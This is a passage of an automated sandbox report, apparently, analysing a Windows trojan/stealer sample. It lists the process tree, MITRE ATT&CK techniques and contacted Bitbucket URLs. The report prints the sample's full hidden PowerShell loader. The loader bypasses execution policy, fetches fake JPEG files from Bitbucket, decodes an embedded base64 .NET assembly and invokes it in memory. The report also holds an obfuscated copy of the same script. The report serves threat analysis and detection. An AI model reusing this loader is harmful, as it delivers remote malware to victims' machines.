        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gg#zwbk#gy#a#bk#gy#zwbk#c8#d#bl#hm#d##v#gq#bwb3#g4#b#bv#ge#z#bz#c8#bgbl#hc#xwbp#g0#yqbn#gu#mg#u#go#c#bn#d8#mq#0#dq#ng#x#dc#mg#x#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#gi#aqb0#gi#dqbj#gs#zqb0#c4#bwby#gc#lwbo#gc#z#bm#gg#z#bm#gc#z##v#hq#zqbz#hq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#ygbh#hm#zq#2#dq#t#bl#g4#zwb0#gg#i##9#c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.orfamco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gg#zwbk#gy#a#bk#gy#zwbk#c8#d#bl#hm#d##v#gq#bwb3#g4#b#bv#ge#z#bz#c8#bgbl#hc#xwbp#g0#yqbn#gu#mg#u#go#c#bn#d8#mq#0#dq#ng#x#dc#mg#x#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#gi#aqb0#gi#dqbj#gs#zqb0#c4#bwby#gc#lwbo#gc#z#bm#gg#z#bm#gc#z##v#hq#zqbz#hq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#ygbh#hm#zq#2#dq#t#bl#g4#zwb0#gg#i##9#cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.orfamco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}"Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21130 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF681C21130
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C28BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF681C28BF4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF681C22D70

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts2
        Native API        		1
        Scripting        		1
        DLL Side-Loading        		1
        Obfuscated Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Install Root Certificate        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Software Packing        		Security Account Manager15
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder        		1
        Timestomp        		NTDS1
        Security Software Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Modify Registry        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Rundll32        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524411 Sample: 0XVZC3kfwL.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 25 bitbucket.org 2->25 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus / Scanner detection for submitted sample 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 7 other signatures 2->39 9 0XVZC3kfwL.exe 1 3 2->9         started        11 rundll32.exe 2->11         started        signatures3 process4 process5 13 cmd.exe 1 9->13         started        signatures6 43 Suspicious powershell command line found 13->43 45 Bypasses PowerShell execution policy 13->45 16 powershell.exe 7 13->16         started        19 conhost.exe 13->19         started        process7 signatures8 29 Suspicious powershell command line found 16->29 31 Found suspicious powershell code related to unpacking or dynamic code loading 16->31 21 powershell.exe 14 15 16->21         started        process9 dnsIp10 27 bitbucket.org 185.166.143.49, 443, 49704, 49705 AMAZON-02US Germany 21->27 41 Installs new ROOT certificates 21->41 signatures11

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        0XVZC3kfwL.exe42%ReversingLabsWin64.Trojan.Leonem
        0XVZC3kfwL.exe100%AviraTR/Spy.Stealer.sgcso

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.microsoft0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://aka.ms/pscore60%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bitbucket.org
        		185.166.143.49
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723true
            		unknown
            https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721true
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://go.microsoft.copowershell.exe, 00000005.00000002.1545100978.000001EEDDEC8000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://crl.microsoftpowershell.exe, 00000004.00000002.1553033093.0000023208545000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://admin.atlassian.compowershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://aka.ms/pscore6powershell.exe, 00000004.00000002.1558255319.000002320A2A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-buildspowershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://api.bitbucket.orgpowershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://preferences.atlassian.compowershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpackpowershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://bitbucket.status.atlassian.com/powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/appowershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/vepowershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://oneget.orgXpowershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://id.atlassian.com/profile/rest/profile&quot;powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://aui-cdn.atlassian.com/powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
